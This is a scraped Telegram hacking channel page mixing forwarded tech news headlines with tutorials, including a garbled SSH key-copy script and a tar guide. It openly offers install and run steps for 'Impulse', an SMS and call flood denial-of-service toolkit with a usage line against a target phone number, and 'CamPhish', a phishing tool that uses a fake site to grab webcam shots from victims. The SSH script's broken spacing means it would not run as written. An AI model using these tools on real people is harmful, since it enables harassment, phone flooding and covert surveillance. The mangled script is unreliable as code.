UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
Vivo announces a new version of the Vivo Y51 smartphone.
#Technologies
Forwarded from UNDERCODE NEWS
Muscovites share a common Instagram account with a million subscribers in court due to divorce.
#Leaks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘πŸ” Configuring SSH login without password for multiple remote servers using a script:

Create a new SSH key on Linux
First, generate an SSH key pair (the private / identity key that the SSH client uses to authenticate when logging into the remote SSH server, and the public key stored as an authorized key on the remote system running the SSH server) using ssh - keygen as follows:
# ssh-keygen


Creating bash script for multiple remote logins
Next, create a script to help copy the public key to multiple remote Linux hosts.

# vim ~ / .bin / ssh-copy.sh
Copy and paste the following code into a file (replace the following variables accordingly USER_NAME is the username to connect to, HOST_FILE is a file containing a list of hostnames or IP addresses, and ERROR_FILE is a file to store any ssh command errors).
#! / bin / bash
USER_NAME = "root"
HOST_FILE = "/ root / hosts"
ERROR_FILE = "/ tmp / ssh-copy_error.txt"
PUBLIC_KEY_FILE = "$ 1"

if [! -f $ PUBLIC_KEY_FILE]; then
echo "File '$ PUBLIC_KEY_FILE' not found!"
exit 1
fi

if [! -f $ HOST_FILE]; then
echo "File '$ HOST_FILE' not found!"
exit 2
fi

for IP in cat $ HOST_FILE; do
ssh-copy-id -i $ PUBLIC_KEY_FILE $ USER_NAME @ $ IP 2> $ ERROR_FILE
RESULT = $?
if [$ RESULT -eq 0]; then
echo ""
echo "Public key copied to $ IP successfully"
echo ""
else
echo "$ (cat $ ERROR_FILE)"
echo
exit 3
fi
echo ""
done
Save the file and close it.

Then make the script executable with the chmod command, as follows:

# chmod + x ssh-copy.sh
Now run the ssh-copy.sh script and provide your public key file as the first argument as shown below:
# ./ssh-copy.sh /root/.ssh/prod-rsa.pub
Then use ssh-agent to manage your keys, which stores your decrypted private key in memory and uses it to authenticate logins.
After starting ssh-agent add your private key to it like this:

# eval "$ (ssh-agent -s)"
# ssh-add ~ / .ssh / prod_rsa
Login to remote Linux server without password
You can now log into any of your remote hosts without entering a password to authenticate the SSH user.

This way you can automate cross-server processes.

# ssh root@10.2.32.12
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Renesas is a new product of Arm microcomputer that enables touchless operation 10 cm away.
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

How to Untar Files in Linux ?

First, let’s create a tar archive with several files and directories. Here, I’ve created a directory with the name β€œAnts” that will be transformed into a tar archive.

$ tree Ants/

Now, let’s make a tar archive out of the directory. Here, tar will use various compression algorithms to do the job. It’s a common practice that the compression algorithm dictates the output file name.

To create a tar archive using gzip compression, use the following command.

$ tar -cvzf ants.tar.gz <source_file_directory>

To create a tar archive using bzip2 compression, use the following command.

$ tar -cvjf ants.tar.bz2 <source_file_directory>

$ tar -cvJf ants.tar.xz <source_file_directory>

Extracting tar files
List tar content

The following tar command will list all the files and directories included in the tar archive.

$ tar -tvf <tar_archive>

The following tar command will extract any valid tar archive. If files with similar filenames exist, upon extraction, tar will overwrite the files outside the archive.

$ tar -xvf <tar_archive>

Here, we’re facing one new tar flag.

x: It tells tar to extract an archive.
If you don’t want tar to overwrite existing data, add the β€œ-k” flag. It tells tar not to overwrite/replace any existing file or directory.

$ tar -xvkf <tar_archive>

There are some situations where you don’t need the entire tar archive extracted only to grab a single file. The tar tool offers such flexibility that you can extract only the select few files you need.

For this task, the tar command structure would look like this. Here, the file name would be the file name of your desired file. It must match with the file name that’s inside the tar archive.

$ tar -xvf <tar_archive> <filename>

If you want to extract a couple of files in such a manner, use the following command structure.

$ tar -xvf <tar_archive> <filename_1> <filename_2>

Unix forums
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Vodafone and Disney launch the new Neo smartwatch.
#international #Technologies
Forwarded from UNDERCODE NEWS
Chatbot spreading through corona, representative case 5
#international
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Updated Impulse Denial-of-service ToolKit :
free SMS & Call flood:

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

A) LINUX

1) sudo apt update

2) sudo apt install python3 python3-pip git -y

3) git clone https://github.com/LimerBoy/Impulse

4) cd Impulse/

5) pip3 install -r requirements.txt

6) python3 impulse.py --help

B) Termux:

1) pkg update

2) pkg install python3 python3-pip git -y

3) git clone https://github.com/LimerBoy/Impulse

4) cd Impulse/

5) pip3 install -r requirements.txt

6) python3 impulse.py --help

TO USE :

python3 impulse.py --method SMS --time 20 --threads 15 --target +(phone)


▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Campari, the hacker attack and the 15 million dollar ransom: "The data of 4,700 employees stolen"
#Leaks #Malwares
Forwarded from UNDERCODE NEWS
WhatsApp: now available the new custom wallpapers, how to set them .
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device

Kali Linux
Termux
MacOS
Ubuntu
Perrot Sec OS

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal

1) apt-get -y install php openssh git wget
Installing (Kali Linux/Termux):

2) git clone https://github.com/techustad/hack

3) cd hack

4) bash camphish.sh

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Supercomputer: This is Davinci-1, Leonardo's computer, and Finmeccanica's computer
#Technologies
Forwarded from UNDERCODE NEWS
IPTV: 5,500 blocked unauthorized pages, very high threats for consumers
#Ban&Block
Forwarded from UNDERCODE NEWS
Google reveals vulnerability to iPhones! Without touch, details can be stolen, and Apple has fixed.
#Vulnerabilities